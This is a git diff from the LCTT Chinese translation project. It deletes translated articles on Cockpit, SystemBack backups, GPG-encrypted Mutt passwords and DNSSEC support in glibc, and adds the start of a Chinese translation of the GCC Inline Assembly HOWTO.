-Cockpit 是由 [Red Hat][1] 开发的使得管理服务器变得轻松简单的免费开源软件。它非常适合于进行简单的系统管理任务和新手系统管理员。它仍然处于开发阶段,还没有稳定版发行。因此不适合于生产环境。它是针对最新的默认安装了 systemd 的 Fedora、CentOS、Arch Linux、RHEL 系统开发的。如果你想在 Ubuntu 上安装 Cockpit,你可以通过 PPA 访问,但现在已经过期了。如果你有任何疑问、建议,请在下面的评论框中反馈给我们,这样我们可以改进和更新我们的内容。非常感谢 !
-
---------------------------------------------------------------------------------
-
-via: http://linoxide.com/linux-how-to/install-cockpit-fedora-centos-rhel-arch-linux/
-
-作者:[Arun Pyasi][a]
-译者:[ictlyh](http://mutouxiaogui.cn/blog/)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://linoxide.com/author/arunp/
-[1]:http://www.redhat.com/
\ No newline at end of file
diff --git a/translated/tech/20151201 Backup (System Restore Point) your Ubuntu or Linux Mint with SystemBack.md b/translated/tech/20151201 Backup (System Restore Point) your Ubuntu or Linux Mint with SystemBack.md
deleted file mode 100644
index c931365600..0000000000
--- a/translated/tech/20151201 Backup (System Restore Point) your Ubuntu or Linux Mint with SystemBack.md
+++ /dev/null
@@ -1,43 +0,0 @@
-# 使用 SystemBack 备份你的 Ubuntu/Linux Mint(系统还原)
-
-对于任何一款允许用户还原电脑到之前状态(包括文件系统,安装的应用,以及系统设置)的操作系统来说,系统还原都是必备功能,可以恢复系统故障以及其他的问题。
-
-有的时候安装一个程序或者驱动可能让你的系统黑屏。系统还原则让你电脑里面的系统文件(译者注:是系统文件,并非普通文件,详情请看**注意**部分)和程序恢复到之前工作正常时候的状态,进而让你远离那让人头痛的排障过程了。而且它也不会影响你的文件,照片或者其他数据。
-
-简单的系统备份还原工具[Systemback](https://launchpad.net/systemback)让你很容易地创建系统备份以及用户配置文件。一旦遇到问题,你可以简单地恢复到系统先前的状态。它还有一些额外的特征包括系统复制,系统安装以及Live系统创建。
-
-截图
-
-![systemback](http://2.bp.blogspot.com/-2UPS3yl3LHw/VlilgtGAlvI/AAAAAAAAGts/ueRaAghXNvc/s1600/systemback-1.jpg)
-
-![systemback](http://2.bp.blogspot.com/-7djBLbGenxE/Vlilgk-FZHI/AAAAAAAAGtk/2PVNKlaPO-c/s1600/systemback-2.jpg)
-
-![](http://3.bp.blogspot.com/-beZYwKrsT4o/VlilgpThziI/AAAAAAAAGto/cwsghXFNGRA/s1600/systemback-3.jpg)
-
-![](http://1.bp.blogspot.com/-t_gmcoQZrvM/VlilhLP--TI/AAAAAAAAGt0/GWBg6bGeeaI/s1600/systemback-5.jpg)
-
-**注意**:使用系统还原不会还原你的文件,音乐,电子邮件或者其他任何类型的私人文件。对不同用户来讲,这既是优点又是缺点。坏消息是它不会还原你意外删除的文件,不过你可以通过一个文件恢复程序来解决这个问题。如果你的计算机没有还原点,那么系统恢复就无法奏效,所以这个工具就无法帮助你(还原系统),如果你尝试恢复一个主要问题,你将需要移步到另外的步骤来进行故障排除。
-
-> > >适用于Ubuntu 15.10 Wily/16.04/15.04 Vivid/14.04 Trusty/Linux Mint 14.x/其他Ubuntu衍生版,打开终端,将下面这些命令复制过去:
-
-终端命令:
-
-```
-sudo add-apt-repository ppa:nemh/systemback
-sudo apt-get update
-sudo apt-get install systemback
-
-```
-
-大功告成。
-
---------------------------------------------------------------------------------
-
-via: http://www.noobslab.com/2015/11/backup-system-restore-point-your.html
-
-译者:[DongShuaike](https://github.com/DongShuaike)
-校对:[Caroline](https://github.com/carolinewuyan)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:https://launchpad.net/systemback
diff --git a/translated/tech/20151201 How to use Mutt email client with encrypted passwords.md b/translated/tech/20151201 How to use Mutt email client with encrypted passwords.md
deleted file mode 100644
index 1e8a032a04..0000000000
--- a/translated/tech/20151201 How to use Mutt email client with encrypted passwords.md
+++ /dev/null
@@ -1,138 +0,0 @@
-如何使用加密过密码的Mutt邮件客户端
-================================================================================
-Mutt是一个开源的Linux/UNIX终端环境下的邮件客户端。连同[Alpine][1],Mutt有充分的理由在Linux命令行热衷者中有最忠诚的追随者。想一下你对邮件客户端的期待的事情,Mutt拥有:多协议支持(e.g., POP3, IMAP and SMTP),S/MIME和PGP/GPG集成,线程会话,颜色编码,可定制宏/快捷键,等等。另外,基于命令行的Mutt相比笨重的web浏览器(如:Gmail,Ymail)或可视化邮件客户端(如:Thunderbird,MS Outlook)是一个轻量访问电子邮件的选择。
-
-当你想使用Mutt通过公司的SMTP/IMAP服务器访问或发送邮件,或取代网页邮件服务,可能所关心的一个问题是如何保护您的邮件凭据(如:SMTP/IMAP密码)存储在一个纯文本Mutt配置文件(~/.muttrc)。
-
-对于一些人安全的担忧,确实有一个容易的方法来**加密Mutt配置文件***,防止这种风险。在这个教程中,我描述了如何加密Mutt敏感配置,比如SMTP/IMAP密码使用GnuPG(GPG),一个开源的OpenPGP实现。
-
-### 第一步 (可选):创建GPG密钥 ###
-
-因为我们将要使用GPG加密Mutt配置文件,如果你没有,第一步就是创建一个GPG密钥(公有/私有 密钥对)。如果有,忽略这步。
-
-创建一个新GPG密钥,输入下面的。
-
- $ gpg --gen-key
-
-选择密钥类型(RSA),密钥长度(2048 bits),和过期时间(0,不过期)。当出现用户ID提示时,输入你的名字(Dan Nanni) 和邮箱地址(myemail@email.com)关联到私有/公有密钥对。最后,输入一个密码来保护你的私钥。
-
-![](https://c2.staticflickr.com/6/5726/22808727824_7735f11157_c.jpg)
-
-生成一个GPG密钥需要大量的随机字节熵,所以在生成密钥期间确保在你的系统上执行一些随机行为(如:打键盘,移动鼠标或者读写磁盘)。根据密钥长度决定生成GPG密钥要花几分钟或更多时间。
-
-![](https://c1.staticflickr.com/1/644/23328597612_6ac5a29944_c.jpg)
-
-### 第二部:加密Mutt敏感配置 ###
-
-下一步,在~/.mutt目录创建一个新的文本文件,然后把一些你想隐藏的Mutt敏感配置放进去。这个例子里,我指定了SMTP/IMAP密码。
-
- $ mkdir ~/.mutt
- $ vi ~/.mutt/password
-
-----------
-
- set smtp_pass="XXXXXXX"
- set imap_pass="XXXXXXX"
-
-现在gpg用你的公钥加密这个文件如下。
-
- $ gpg -r myemail@email.com -e ~/.mutt/password
-
-这将创建~/.mutt/password.gpg,这个是一个GPG加密原始版本文件。
-
-继续删除~/.mutt/password,只保留GPG加密版本。
-
-### 第三部:创建完整Mutt配置文件 ###
-
-由于你已经在一个单独的文件加密了Mutt敏感配置,你可以在~/.muttrc指定其余的Mutt配置。然后增加下面这行在~/.muttrc末尾。
-
- source "gpg -d ~/.mutt/password.gpg |"
-
-当你使用Mutt,这行将解密~/.mutt/password.gpg,然后将解密内容应用到你的Mutt配置。
-
-下面展示一个完整Mutt配置例子,这允许你用Mutt访问Gmail,没有暴露你的SMTP/IMAP密码。取代你用Gmail ID登陆你的账户。
-
- set from = "yourgmailaccount@gmail.com"
- set realname = "Your Name"
- set smtp_url = "smtp://yourgmailaccount@smtp.gmail.com:587/"
- set imap_user = "yourgmailaccount@gmail.com"
- set folder = "imaps://imap.gmail.com:993"
- set spoolfile = "+INBOX"
- set postponed = "+[Google Mail]/Drafts"
- set trash = "+[Google Mail]/Trash"
- set header_cache =~/.mutt/cache/headers
- set message_cachedir =~/.mutt/cache/bodies
- set certificate_file =~/.mutt/certificates
- set move = no
- set imap_keepalive = 900
-
- # encrypted IMAP/SMTP passwords
- source "gpg -d ~/.mutt/password.gpg |"
-
-### 第四部(可选):配置GPG代理 ###
-
-这时候,你将可以使用加密了IMAP/SMTP密码的Mutt。无论如何,每次你运行Mutt,你都要先被提示输入一个GPG密码来使用你的私钥解密IMAP/SMTP密码。
-
-![](https://c2.staticflickr.com/6/5667/23437064775_20c874940f_c.jpg)
-
-如果你想避免这样的GPG密码提示,你可以部署gpg代理。运行一个后台程序,gpg代理安全的缓存你的GPG密码,无需手工干预gpg自动从gpg代理获得你的GPG密码。如果你正在使用Linux桌面,你可以使用桌面特定方式来配置一些东西等价于gpg代理,例如,GNOME桌面的gnome-keyring-daemon。
-
-你可以在基于Debian系统安装gpg代理:
-
-$ sudo apt-get install gpg-agent
-
-gpg代理是基于Red Hat系统预装的。
-
-现在增加下面这些道你的.bashrc文件。
-
- envfile="$HOME/.gnupg/gpg-agent.env"
- if [[ -e "$envfile" ]] && kill -0 $(grep GPG_AGENT_INFO "$envfile" | cut -d: -f 2) 2>/dev/null; then
- eval "$(cat "$envfile")"
- else
- eval "$(gpg-agent --daemon --allow-preset-passphrase --write-env-file "$envfile")"
- fi
- export GPG_AGENT_INFO
-
-重载.bashrc,或单纯的登出然后登陆回来。
-
- $ source ~/.bashrc
-
-现在确认GPG_AGENT_INFO环境变量已经设置妥当。
-
- $ echo $GPG_AGENT_INFO
-
-----------
-
- /tmp/gpg-0SKJw8/S.gpg-agent:942:1
-
-并且,当你输入gpg-agent命令时,你应该看到下面的信息。
-
- $ gpg-agent
-
-----------
-
- gpg-agent: gpg-agent running and available
-
-一旦gpg-agent启动运行,它将会在第一次提示你输入密码时缓存你的GPG密码。随后你运行Mutt多次,你将不会被提示要GPG密码(gpg-agent一直开着,缓存就不会过期)。
-
-![](https://c1.staticflickr.com/1/664/22809928093_3be57698ce_c.jpg)
-
-### 结论 ###
-
-在这个指导里,我提出一个方法加密Mutt敏感配置如SMTP/IMAP密码使用GnuPG。注意,如果你想在Mutt上使用GnuPG或者登陆你的邮件信息,你可以参考[官方指南][2]在使用GPG与Mutt结合。
-
-如果你知道任何使用Mutt的安全技巧,随时分享他。
-
---------------------------------------------------------------------------------
-
-via: http://xmodulo.com/mutt-email-client-encrypted-passwords.html
-
-作者:[Dan Nanni][a]
-译者:[wyangsun](https://github.com/wyangsun)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://xmodulo.com/author/nanni
-[1]:http://xmodulo.com/gmail-command-line-linux-alpine.html
-[2]:http://dev.mutt.org/trac/wiki/MuttGuide/UseGPG
diff --git a/translated/tech/20151206 Supporting secure DNS in glibc.md b/translated/tech/20151206 Supporting secure DNS in glibc.md
deleted file mode 100644
index c66a28257c..0000000000
--- a/translated/tech/20151206 Supporting secure DNS in glibc.md
+++ /dev/null
@@ -1,46 +0,0 @@
-通过修改 glibc 支持 DNS 加密
-========================
-
-感谢:Jonathan Corbet
-
-域名解析系统(DNS)是因特网安全许多薄弱环节之一;可以误导应用程序所访问的主机相应的 IP 地址。也就是说,会连接到错误的位置,可以引发中间人攻击以及更多攻击。而 DNSSEC 扩展协议是通过为 DNS 信息建立一条加密的可信通道来解决这个漏洞。在正确地配置好 DNSSEC 后,应用程序将可以得到可靠的主机查询信息。通过关于尝试将 DNSSEC 更好地集成到 GNU C 库里的讨论,确保 DNS 查询信息安全并不是那么简单。
-
-某种意义上来说,这个问题多年以前就解决了,我们可以配置一个本地域名服务实现完整的 DNSSEC 认证并允许应用程序通过 glibc 函数来使用该服务。DNSSEC 甚至还可以用于提高其他领域的安全性,比如,它可以携带 SSH 或 TLS 密钥指纹,让应用程序可以确认其在与正确的服务器通话。不过,当我们希望确认这条自称带有 DNSSEC 认证的 DNS 结果是不是真的已通过认证的时候 - 也就是说,当我们想依赖 DNSSEC 所承诺的安全的时候,事情变得有点复杂。
-
-/etc/resolv.conf 问题
-
-从 glibc 的角度来看,这个问题一部分是因为 glibc 本身并没有做 DNSSEC 认证。而是引用 /etc/resolv.conf 文件,从该文件里读出的服务器来做解析以及认证,再将结果返回给应用程序。如果应用程序使用底层 res_query() 接口,那结果中将会包含“已认证数据”(AD)标识(如果域名服务器设定了的话)以表示 DNSSEC 认证已经成功。但是 glibc 却完全不知道提供这些结果的域名服务器的信用,所以它其实并不能告诉应用程序结果是否真的可靠。
-
-由 glibc 的维护者 Carlos O'Donell 提出的建议是在 resolv.conf 文件里增加一个选项(dns-strip-dnssec-ad-bit)告诉 glibc 无条件移除 AD 标识。这个选项可以由各发行版设定,表示 DNSSEC 级别的 DNS 查询结果并不可靠。而一旦建立好合适的环境可以获得可靠的查询结果后,再移除这个选项。这样一来,虽然问题还没有完全解决,至少应用程序有依据来评价从 glibc 获取的 DNS 查询结果的可靠性。
-
-一个可靠的环境配置应该是什么样?标准情况应该和这个差不太多:有一个本地域名服务器,通过环路接口访问,作为访问 /etc/resolv.conf 文件的唯一入口。这个域名服务器应该配置来做认证,而在认证失败后就只是简单地不返回任何结果。绝大多数情况下,应用程序就不再需要关心 AD 标识,如果结果不可靠,应用程序就根本看不到。一些发行版已经偏向这种模型,不过情况仍然不像一些人所设想的没那么简单。
-
-其中一个问题是,这种方式将 /etc/resolv.conf 文件放到整个系统可信任度的中心。但是,在一个典型的 Linux 系统里,有无数的 DHCP 客户端、网络脚本以及其他更多,可以修改这个文件。就像 Paul Wouters 所指出的,在短时间内锁定这个文件是不可能的。有时候这种改变是必须的:在一个无盘系统启动的时候,在自身的域名服务器启动之前也是需要域名服务的;一个系统的整个 DNS 环境也会根据所连接的网络不同而有所改变;运行在容器里的系统也最好是配制成使用宿主机的域名服务器;等等。
-
-所以,现在一般认为,现有系统里的 /etc/resolv.conf 文件并不可信。于是有人提出增加另一个配置文件(/etc/secure-resolv.conf 或其他什么),但这并没有从根本上解决问题。除此之外,有些参与人员觉得就算有一个运行在环路接口上的域名服务器也不是真正可靠,比如 Zack Weinberg 甚至建议系统管理员可以有意禁用 DNSSEC 认证。
-
-既然当前系统里的配置不足以信任,那可以这样推断,在情况有改善能够取得可信的结果后,glibc 需要有一种方式来通知应用程序。可以是上面讨论的屏蔽 AD 标识的方式(或者与之相反,增加一个显示的“此域名服务器可以信任”选项);当然,这都需要一定程度上锁定系统以免 /etc/resolv.conf 受到任何不可预计的修改。按 Petr Spacek 的建议,还有一种引申方式,就是提供一种途径允许应用程序查询 glibc 当前通讯的是不是本地域名服务器。
-
-在 glibc 里来处理?
-
-另一种方式是去掉域名服务器,而是让 glibc 本身来做 DNSSEC 认证。不过,把这么大一坨加密相关代码放进 glibc 也是有很大阻力。这样将增加库本身的大小,从而感觉会增加使用它的应用程序的受攻击面积。这个方向再引申一下,由 Zack 提出的建议,可以把认证相关代码放到域名服务缓冲守护进程(nscd)里。因为 nscd 也是 glibc 的一部分,由 glibc 开发人员维护,因此在一定程度上可以相信能正确执行 DNSSEC 认证。而且 nscd 的通讯 socket 所在位置也是公开的,所以可以不考虑 /etc/resolv.conf 问题。不过,Carlos 担心这种方式不能让那些不想使用 nscd 缓存功能的用户所接受;在他看来,基本可以排除 nscd 的方式。
-
-所以,至少近期内,glibc 不太可能全部执行带 DNSSEC 认证的整个查询过程。这意味着,如果一个有安全考虑的应用要使用 glibc 库来查询域名,库将需要提供一个标识来评价从独立域名服务器返回的结果有多大程度的可靠性。这几乎肯定需要发行商或系统管理员做出一些明确的改动。就像 Simo Sorce 说的那样:
-
-如果 glibc 不使用明确的配置选项来通知应用程序它所用的域名解析是可信的,不会有什么用。。。不改一下还有很大弊端,因为应用程序开发者将马上认识到他们不能信任从 glibc 获取的任何信息,从而在处理 DNSSEC 相关信息时就简单地不用它。
-
-要配置一个系统能正常使用 DNSSEC 需要改动该系统的很多组件 - 这是一个发行版范围的问题,需要时间来完全解决。在这个转变过程中 glibc 所扮演的角色很可能会比较小,但是很重要的一部分:如果应用程序不实现一套自己的域名解析代码,glibc 很可能是保证 DNS 结果可信的唯一方式。在一个系统中运行多个 DNSSEC 实现方式看起来不像是一种安全的方式,所以最好还是把事情做对了。
-
-glibc 项目目前并没有确定用哪种方式来做这个事情,虽然从 /etc/resolv.conf 文件里的某些标记看上去快好了。这种改动应该需要发布新版本;考虑到 glibc 开发的保守天性,很可能来不及加入预计二月份发布的 2.23 版本了。所以 glibc 中暂时还不会有更高安全性的 DNSSEC ,不过在这个方向上也有一些进展了。
-
----------------------------
-
-via: https://lwn.net/Articles/663474/
-
-作者:Jonathan Corbet
-
-译者:[zpl1025](https://github.com/zpl1025)
-
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/translated/tech/20151220 GCC-Inline-Assembly-HOWTO.md b/translated/tech/20151220 GCC-Inline-Assembly-HOWTO.md
new file mode 100644
index 0000000000..e0e1fc6d50
--- /dev/null
+++ b/translated/tech/20151220 GCC-Inline-Assembly-HOWTO.md
@@ -0,0 +1,632 @@
+* * *
+
+# GCC 内联汇编 HOWTO
+
+v0.1, 01 March 2003.
+* * *
+
+_本 HOWTO 文档将讲解 GCC 提供的内联汇编特性的用途和用法。阅读本文只有两个前提要求,很明显,就是对 x86 汇编语言和 C 语言有基本的认识。_
+
+* * *
+
+## 1. 简介
+
+## 1.1 版权许可
+
+Copyright (C)2003 Sandeep S.
+
+本文档可自由分发;你可以在自由软件基金会发布的 GNU 通用公共许可证(版本 2,或者按照你的需要选择更新的版本)的条款下重新发布它,并且/或者修改它。
+
+发布这篇文档是希望它能够帮助别人,但是不带任何担保;甚至不包括对适销性和适用于任何特定目的的默示担保。关于更详细的信息,可以查看 GNU 通用公共许可证。
+
+## 1.2 反馈校正
+
+请将反馈和批评提交给 [Sandeep.S](mailto:busybox@sancharnet.in)。我将感谢任何一个指出本文档中错误和不准确之处的人;一经告知,我会马上改正它们。
+
+## 1.3 致谢
+
+我对提供如此出色特性的 GNU 人们表示真诚的感谢。感谢 Mr.Pramode C E 所做的所有帮助。感谢 Govt Engineering College, Trichur 的朋友们的精神支持与合作,尤其是 Nisha Kurur 和 Sakeeb S。感谢 Govt Engineering College, Trichur 的老师们的合作。
+
+另外,感谢 Phillip、Brennan Underwood 和 colin@nyx.net;这里的许多东西都厚颜地直接取自他们的工作成果。
+
+* * *
+
+## 2. 概览
+
+在这里,我们将学习 GCC 内联汇编。这里的“内联(inline)”表示的是什么呢?
+
+我们可以要求编译器将一个函数的代码插入到调用者代码中函数被实际调用的地方。这样的函数就是内联函数。这听起来和宏差不多?这两者确实有相似之处。
+
+内联函数的优点是什么呢?
+
+这种内联方法可以减少函数调用的开销。同时,如果某些实参的值是常量,编译器就可以利用这些已知值在编译期进行简化,因此并非内联函数的所有代码都需要被包含进来。它对代码大小的影响是不可预测的,取决于具体情况。为了声明一个内联函数,我们必须在函数声明中使用 `inline` 关键字。
+
+现在大概可以猜到内联汇编到底是什么了:它只不过是以内联函数的形式书写的汇编例程。在系统编程上,它们方便、快速并且极其有用。我们主要集中学习(GCC)内联汇编函数的基本格式和用法。声明内联汇编函数时,我们使用 `asm` 关键词。
+
+内联汇编之所以重要,主要是因为它能够对 C 变量进行操作,并把输出体现在 C 变量上。正是因为这种能力,“asm”可以用作汇编指令和包含它的 C 程序之间的接口。
+
+* * *
+
+## 3. GCC 汇编语法
+
+GCC,即 Linux 上的 GNU C 编译器,使用 **AT&T**/**UNIX** 汇编语法。在这里,我们将使用 AT&T 语法进行汇编编码。如果你对 AT&T 语法不熟悉的话,请不要紧张,我会教你的。AT&T 语法和 Intel 语法的差别很大,我会给出其中主要的区别。
+
+1. 源操作数和目的操作数顺序
+
+    AT&T 语法的操作数方向和 Intel 语法的刚好相反。在 Intel 语法中,第一个操作数为目的操作数,第二个操作数为源操作数;然而在 AT&T 语法中,第一个操作数为源操作数,第二个操作数为目的操作数。也就是说,
+
+ Intel 语法中的 "Op-code dst src" 变为
+
+ AT&T 语法中的 "Op-code src dst"。
+
+2. 寄存器命名
+
+    寄存器名称有 % 前缀,即如果要使用 eax,应该写作 %eax。
+
+3. 立即数
+
+    AT&T 语法中,立即数以 ’$’ 为前缀,静态 "C" 变量也使用 ’$’ 前缀。在 Intel 语法中,十六进制常量以 ’h’ 为后缀,然而 AT&T 不使用这种语法,这里我们给常量加上前缀 ’0x’。所以,对于十六进制,我们首先看到一个 ’$’,然后是 ’0x’,最后才是常量。
+
+4. 操作数大小
+
+    在 AT&T 语法中,存储器操作数的大小取决于操作码名字的最后一个字符。操作码后缀 ’b’、’w’、’l’ 分别指明了字节(byte,8 位)、字(word,16 位)、长型(long,32 位)的存储器引用。Intel 语法通过给存储器操作数添加 ’byte ptr’、’word ptr’ 和 ’dword ptr’ 前缀来实现这一功能。
+
+ 因此,Intel的 "mov al, byte ptr foo" 在 AT&T 语法中为 "movb foo, %al"。
+
+5. 存储器操作数
+
+    在 Intel 语法中,基址寄存器包含在 ’[’ 和 ’]’ 中,然而在 AT&T 中,它们变为 ’(’ 和 ’)’。另外,在 Intel 语法中,间接内存引用为
+
+    section:[base + index*scale + disp],在 AT&T 中变为
+
+ section:disp(base, index, scale)。
+
+ 需要牢记的一点是,当一个常量用于 disp 或 scale,不能添加’$’前缀。
+
+    需要牢记的一点是,当一个常量用于 disp 或 scale 时,不能添加 ’$’ 前缀。
+
+> `
+>
+>